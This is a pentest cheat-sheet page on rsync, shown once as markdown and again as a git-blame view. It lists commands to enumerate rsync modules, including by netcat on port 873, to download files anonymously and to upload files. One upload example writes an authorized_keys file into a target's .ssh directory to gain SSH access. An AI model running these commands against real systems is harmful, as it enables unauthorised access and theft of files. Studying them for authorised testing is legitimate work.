killchain-compendium/Enumeration/rsync.md

# rsync

> rsync is an open source utility that provides fast incremental file transfer.
> rsync is freely available under the GNU General Public License and is currently
> being maintained by Wayne Davison.
> -- [rsync.samba.org](rsync.samba.org)

## Enumerate via rsync

Enumerate files and directories via rsync in the following ways

```sh
rsync <target-IP>::
rsync <target-IP>::files
rsync <target-IP>::files/foo/
```

### Enumerate through rsync protocol via netcat

Another way is the following

```sh
nc -vn $TARGET_IP 873
```

Repeat the handshake identical to the rsync binary, e.g.

```
@RSYNCD: 31.0
```

Afterwards you are able to list all directories

```sh
#list
```

## Downloads via rsync

Download files and directories through rsynv via the following commands

```sh
rsync <user>@<target-IP>::/files/foo/bar.txt .
rsync -r <user>@<target-IP>::/files/foo .
```

Login anonymously might work out in some cases, use no credentials at all to connect anonymously.

## Uploads via rsync

Upload files and directories through rsynv via the following commands

```sh
rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/
rsync -r documents <user>@<target-IP>::/files/foo/
```

## References

* [rsync webpage](rsync.samba.org)
* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)
restructured enumeration 2022-11-13 01:16:26 +01:00			`# rsync`

added information 2023-08-13 22:57:52 +02:00			`> rsync is an open source utility that provides fast incremental file transfer.`
			`> rsync is freely available under the GNU General Public License and is currently`
			`> being maintained by Wayne Davison.`
			`> -- [rsync.samba.org](rsync.samba.org)`
restructured enumeration 2022-11-13 01:16:26 +01:00
added information 2023-08-13 22:57:52 +02:00			`## Enumerate via rsync`

			`Enumerate files and directories via rsync in the following ways`
restructured enumeration 2022-11-13 01:16:26 +01:00
			```sh
			`rsync <target-IP>::`
			`rsync <target-IP>::files`
			`rsync <target-IP>::files/foo/`
			```
updates 2022-12-28 18:02:39 +01:00
added information 2023-08-13 22:57:52 +02:00			`### Enumerate through rsync protocol via netcat`

			`Another way is the following`
updates 2022-12-28 18:02:39 +01:00
restructured enumeration 2022-11-13 01:16:26 +01:00			```sh
			`nc -vn $TARGET_IP 873`
			```
added information 2023-08-13 22:57:52 +02:00
			`Repeat the handshake identical to the rsync binary, e.g.`

restructured enumeration 2022-11-13 01:16:26 +01:00			```
			`@RSYNCD: 31.0`
			```
added information 2023-08-13 22:57:52 +02:00
			`Afterwards you are able to list all directories`

restructured enumeration 2022-11-13 01:16:26 +01:00			```sh
			`#list`
			```

added information 2023-08-13 22:57:52 +02:00			`## Downloads via rsync`

			`Download files and directories through rsynv via the following commands`
restructured enumeration 2022-11-13 01:16:26 +01:00
			```sh
			`rsync <user>@<target-IP>::/files/foo/bar.txt .`
			`rsync -r <user>@<target-IP>::/files/foo .`
			```

added information 2023-08-13 22:57:52 +02:00			`Login anonymously might work out in some cases, use no credentials at all to connect anonymously.`

			`## Uploads via rsync`

			`Upload files and directories through rsynv via the following commands`
restructured enumeration 2022-11-13 01:16:26 +01:00
			```sh
			`rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/`
			`rsync -r documents <user>@<target-IP>::/files/foo/`
			```
added information 2023-08-13 22:57:52 +02:00
			`## References`

			`* [rsync webpage](rsync.samba.org)`
			`* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)`
			`* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)`